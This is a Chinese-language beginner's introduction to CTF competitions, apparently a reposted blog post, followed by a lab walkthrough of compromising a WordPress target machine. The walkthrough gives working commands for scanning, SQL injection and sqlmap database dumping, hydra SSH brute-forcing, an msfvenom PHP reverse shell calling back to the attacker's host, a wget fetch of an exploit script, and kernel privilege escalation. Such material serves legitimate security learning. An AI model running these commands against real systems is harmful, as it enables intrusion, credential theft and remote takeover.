标签：shell -- 什么 CTF 漏洞 xx id

本文是对入门学习的一些概念了解和一些常规场景记录

1.CTF（capture the flag）是夺旗赛的意思。

是网络安全技术人员之间进行攻防的比赛。
起源1996年DEFCON全球黑客大会，替代之前真实攻击的技术比拼。
(DEFCON极客大会诞生1993，每年7月在拉斯维加斯举行）
有黑客比赛的世界杯的说法。
CTF竞赛已成为安全圈最流行竞赛模式。

国际知名赛事

DEFCON CTF：CTF赛事中的“世界杯”
UCSB iCTF：来自UCSB的面向世界高校的CTF
Plaid CTF：包揽多项赛事冠军的CMU的PPP团队举办的在线解题赛 
Boston Key Party：近年来崛起的在线解题赛
Codegate CTF：韩国首尔“大奖赛”，冠军奖金3000万韩元
Secuinside CTF：韩国首尔“大奖赛”，冠军奖金3000万韩元
XXC3 CTF：欧洲历史最悠久CCC黑客大会举办的CTF

国内知名赛事

XCTF联赛：是国内最权威、最高技术水平与最大影响力的网络安全CTF赛事平台。
(国内，亚洲最大竞赛。清华蓝莲花战队发起）
强网杯：国家级安全比赛，网信办网络安全协调局指导。
红帽杯：广东公安厅，计算机网络安全协会举办
AliCTF:阿里
TCTF:腾讯
BCTF:百度
WCTF:世界大赛邀请制，360
HCTF:杭州电子科技大学信息安全协会
ISCC:全国大学生，北理工

2.竞赛模式：

1.解题模式（jeopardy风险，危险)

通常是线上参与，网络安全技术的题目。
题目包含：逆向，漏洞挖掘和利用，web渗透，密码，取证，隐写，安全编程等类型。

 2.攻防模式（attack&defense）

互相攻击防守，挖掘漏洞攻击和修复漏洞防守。

3.混杂模式（mix)

解题和攻防模式结合，典型赛事iCTF。

3.题目类型

3.1.reverse（逆向）

涉及逆向分析能力：软件逆向，破解技术，反汇编和反编译技术。
知识：汇编语言，加解密，反编译工具等。

3.2.Pwn（破解）

pwn发音砰，破解的意思，主要溢出漏洞（堆和栈溢出等）。
涉及对二进制漏洞挖掘和利用能力。
知识：c/c++,OD+IDA,数据结构，操作系统，汇编原理。
（CE(CheatEngine)用来定位数据，OD（ollydbg)用来动态调试，IDA(Interactive Disassembler)用来看代码）

3.3.web（web安全）

web站点漏洞挖掘和利用：XSS,文件包含，代码执行，上传漏洞，sql注入等。
以及数据包的构造和响应，tcp/ip协议。
知识：PHP，JSP, JAVA, Python，TCP/IP，SQL，OWASP TOP 10

3.4.crypto（加解密）

涉及密码学相关技术，加解密技术，编码解码技术。
知识：数论，矩阵，密码学。

3.5.misc(杂项）

安全相关：信息收集，隐写，流量分析，数字取证，编码转换。
知识：隐写术，wireshark流量分析审查等工具使用，编码。

3.6.mobile（移动）

涉及APP漏洞挖掘和利用：iPhone和Android系统，以Android的apk破解为主。
知识：Android 

4.学习建议：

可以刷题或者靶机练习，以web安全作为学习入口是不错选择。

XCTF（攻防世界）
Bugku CTF  
Jarvis OJ  
ctf.show 
BUUCTF  
CTFHub  

 词汇简介：POC，EXP，CVE，CVSS

POC（Proof of Concept）
漏洞证明，漏洞报告中，通过一段描述或一个样例来证明漏洞确实存在

EXP（Exploit）
漏洞利用，某个漏洞存在EXP，意思就是该漏洞存在公开的利用方式（比如一个脚本）

0DAY
含义是刚刚被发现，还没有被公开的漏洞，也没有相应的补丁程序，威胁极大。

CVE（Common Vulnerabilities & Exposures）
公共漏洞和暴露，信息安全漏洞公共的名称。
使用一个共同的名字，可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息，解决安全问题 。

5.靶机实战：拿下wordpress提权

测试环境：

kali攻击机和WordPress系统的靶机。
WordPress是一款个人博客框架属于内容管理系统（CMS）使用PHP语言和mysql数据库架设。

攻击过程：

信息收集，漏洞挖掘，漏洞利用，权限提升。

5.1.信息收集

包括：主机，ip，端口，服务，操作系统，目录等扫描收集及社工。
1.主机发现工具：arp-scan netdiscover fping等。
arp-scan -l //局域网扫描
netdiscover -i eth0 -r 192.168.133.0/24 //网段扫描
通过mac地址得到厂商。

2.端口扫描工具：nmap
-A:全面探测（aggressive（进攻性）） -sS:SYN扫描（半连接） -sV:显示版本 -v:显示vebose详细过程 
-p-:全端口（1-65535） -T4:延迟级别，放弃超时10ms
nmap -sS -sV -v -p- -T4  192.168.12.1
nmap -A ip
nmap -A -sS -sV -v -p- -T4  192.168.12.1

常见端口和服务：
22:ssh 25:smtp 80:http 111:RPCINFO服务 443：HTTPS服务
624：PRC 3306：MYSQL


3.信息收集目标就是威胁建模
(简单来说就是猜测服务可能存在攻击方式和漏洞）
对于web服务主要收集：服务和系统的名称和版本。
可以利用谷歌浏览器Wappalyzer插件收集：系统和服务的版本信息
WordPress版本，操作系统，数据库类型，PHP版本

web地址的参数或者表单验证是否可sql注入，
一般首页是没有参数的，选择注册页或者可传参数的页面
比如xx?id=1 
后面加个冒号：xxx?id=1' 
后面加 and 1=1 后者and 1=2：id=1 and 1=1 或者id=1 and 1=2
and sleep(5)

根据响应页面的内容对比判断是否存在注入点。
一般使用工具sqlmap更方便

ssh尝试弱口令爆破
工具：九头蛇 美杜莎

4.目录扫描：dirb，dirbuster，gobuster，御剑等工具。nikto。
对于web目录扫描是关键步骤，甚至首步骤。
作用：敏感目录和敏感文件可能泄露（管理页面，遗留文件）。

 发现管理后台，数据库管理页面。

5.2.漏洞挖掘

几种方式：
1.对于管理后台尝试：
弱口令（默认密码，常用密码），
暴力破解（工具：burp爆破，PHPmyadmin爆破）。
比如phpmyadmin(数据库网页管理工具的主页）

2.链接的参数注入
工具：sqlmap参数：-u:url --dbs：爆破数据库 -D：指定数据库 --tables:爆破数据表 -T:指定表 --columns：爆破字段 -C:指定字段（可多个） --dump :脱库
sql注入检测：sqlmap -u "http://xxx?id=1" 
得到数据库，web服务器，操作系统类型和版本以及具体库
sql注入检测：sqlmap -u "http://xxx?id=1"  --dbs
得到哪些库
sqlmap -u "xxx?id=1" --dbs -D xx --tables
得到爆破xx库的表
sqlmap -u "xxx?id=1" --dbs -D xx --tables -T xx --columns
得到爆破的字段
sqlmap -u "xxx?id=1" --dbs -D xx --tables -C xx,xx,xx --dump
得到爆破字段的内容

有时需要cookie（登陆后）才能sqlmap扫描参数：
获取cookie：浏览器开发者网络查看或者控制台（输入document.cookie获取)
sqlmap -u "http://xxx?id=1" -p id --cookie="xxx=xxxxxxxx" --dbs

通过爆破可能得到账号和密码，如果服务支持ssh，可以尝试连接
>ssh xx用户@ipxxxx
>密码xxx
(制作密码字典工具以及破解：crunch ；hydra 。
比如：crunch 8 8 -t admin%%@@ -o dic.txt //8 8：最小8位最大八位 -t:占位符 %数字 @小写字母 -o:输出文件
暴力破解ssh:
hydra -l guest -P dic.txt xx.xx.ip ssh

3.网页前端源码查看
是否只是前端验证。

4.nikto可对web服务器全面漏洞扫描：服务器cgi和项目及配置等
cgi通用网关接口:网页原本是静态的，通过cgi脚本进行处理生成页面返回给浏览器形成动态交互网页，类似servelet。
有时候指服务器，有时候 指cgi语言。
nikto -h http://xxx 
得到一些敏感目录和文件，比如源码b备份，sql等
分析源码获得漏洞，获取管理员账号等

拿到网站管理员权限：密码破解获得数据库管理权限以及后台管理员

5.3.漏洞利用

1.利用MSF生成反弹shell（木马）
msfvenom -p php/meterpreter/reverse_tcp LHOST=自己主机ip LPORT=4444 -o Desktop/shell.php
生成php网页木马，让目标连接自己主机
kali自带php马:/usr/share/webshells/php/php-reverse-sell.php

2.上传马
将马页面放到php执行目录，或者写入可执行某个页面。

3.监听原先木马设置端口以建立链接
几种方式：
1)netcat工具：类似工具：中国菜刀
nc -nlvp 4444
2)msf
msf>use exploit/multi/handler
>set playload php/meterpreter_reverse_tcp
>set lhost ip
>exploit
执行后会形成一个会话session，ctr+c可退出，
输入：session 1进入会话:
meterpreter>

linux查看监听：netstat -tunlp

4.得到shell
访问马页面，监听程序得到反弹shell.
此时这个shell是web服务器的权限也就是Apache服务器权限。
whoami ;查看当前权限
uname -a : 查看linux系统内核版本

如果使用msf监听那么执行exploit，连接建立后会得到shell
meterpreter>
输入：sysinfo 查看系统版本信息，
输入：shell 生成交互shell
还可以切换不同样式的shell:交互更友好：
python -c 'import pty;pty.spawn("/bin/bash")'
(common shell和 meterpreter shell区分
有些连接得到是common shell 使用ctr+z 
然后:y 让当前shell隐藏回到msf界面，
使用session -l :查看所有会话shell，每个会话有个id。
session -u 某id：将某会话从common变成meterpreter
session -i 某id :进入某id会话
）


5.权限提升，获取root权限
1).漏洞脏牛（dirty cow，CVE-2016-5195)对Linux内核>=2.6.22版本（2007年发布）本地提权，直到2016.10才修复。
原理：内核的内存子系统在处理写入复制时（copy-on-write)产生了竞争条件，利用执行顺序异常，对只读内存映射进行写入，获得root权限。
github官方提供exp
2).漏洞udev(cve2009-1185 linux2.6的一个提权漏洞)
searchsploit linux udev (漏洞库搜索udev漏洞的exp)
/usr/share/exploitdb/platforms/linux/local/8478.sh

exp在靶机执行需要先获取执行文件，还的添加执行权限。
提供一个传送地址的几种方式：
1).sh放在/tmp下，并执行：python -m SimpleHTTPServer 80
目标主机获取：wget http://xx/xx.sh
查看进程：cat /proc/net/netlink 
在特定进程执行udev

思路：知道漏洞，找到漏洞exp。

补充：低权限rbash提升（绕过）

当用guest用户登陆系统：ssh gust@xx.xx.xx.ip
得到的shell可能权限非常低很多命令不能使用
当前是rbash解析命令:
echo $PATH:查看当前path。
输出：/home/guest/prog
输入命令会先到path目录下查找，存在才会直接执行，否则需要输入全路径才行执行。

echo $PATH/*:查看可以直接执行的命令
输出：/home/guest/prog/vi
即表面可以直接执行vi。
进入vi:
:!/bin/bash //!在命令前面表示调用外部命令，在命令后面（wq!)表示强制执行。
执行后命令使用bash来解析。
(sudo以管理员运行，su切换用户，sudo su 切换到管理员）
执行sudo su 显示找不到命令sudo
某目录查找命令：
ls -la /bin/sudo
ls -la /sbin/sudo
ls -la /usr/bin/sudo //确定sudo位置
修改环境变量：
export PATH=$PATH:/usr/bin/sudo
查看当前path:
echo $paht
查找将su命令路径添加到环境：
ls -la /bin/su //确认位置
修改path:
export PATH=$PATH:/bin/su
接下可以执行：sudo su（需要有密码）

5.4.如何防御：

1.关闭多余端口，最小原则。
2.使用cms等系统，修改默认后台路径。
3.数据管理PHPmyadmin修改默认路径和密码。
4.升级操作系统版本，及时打补丁修复漏洞。
5.关注最新漏洞情报，提升安全运维响应能力。

 

标签：shell,--,什么,CTF,漏洞,xx,id
来源： https://www.cnblogs.com/straybirds/p/16648268.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。